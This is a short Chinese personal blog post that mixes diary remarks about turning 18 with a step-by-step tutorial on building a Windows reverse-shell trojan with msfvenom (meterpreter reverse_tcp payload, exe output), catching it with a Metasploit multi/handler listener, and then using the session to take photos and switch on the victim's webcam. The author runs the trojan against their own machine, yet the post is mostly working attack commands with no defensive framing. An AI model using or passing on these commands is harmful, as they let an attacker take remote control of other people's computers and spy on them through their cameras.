又回到了那个不想打游戏不想聊天不想说话的日子。
不用想。vm——>kali
很早以前看过用msfvenom生成木马的文章。然后……然后我的浏览器就崩溃了。Firefox。只好用回edge。
然后。。看到了小时候的照片,从小到大。真的是不知不觉。18了就。
由于是在空间和博客同时发表。其实也没什么所谓了。各位社工大佬因该也看不上这张模糊的 。老照片!
>msfvenom
常用也是必须要的命令。-p 和-f 。 可以简单的理解为执行木马环境和其后缀名。
常用格式就是:msfvenom -p xx -f xx
一个简单的Windows下的木马生成就是:
msfvenom -p windows/meterpreter/reverse_tcp lhost=xx lport=xx -f exe -o xxx
默认生成在HOME 主文件夹下面。 更改-o参数可以修改保存位置。
lhost和lport是监听机子的ip和端口。
kali用ifconfig可以查看。
然后
进msf msfconsole
use exploit/multi/handler
set lhost xx
set lport xx
进入到模块 设置监听。
然后
exploit 开始监听。 详细命令:
http://www.myhack58.com/Article/60/76/2012/35370_2.htm
后面的2017文件夹是我在本机创建的ftp。 xx.exe就是木马。我们在本机运行测试效果。
然后sessions 查看回话。
sessions -i 1 进入到我们的回话中。 接下来就是重头戏了。本来想列出命令表。在网上找不到全的。
直接输入help就可以得到解释。 我们就看这两个命令:
第一个 拍照。
第二个 打开摄像头!
我们测试第二个。
他会打开一个浏览器。中间就是我们摄像头可以看到的东西了(被我用大拇指挡住了-_-)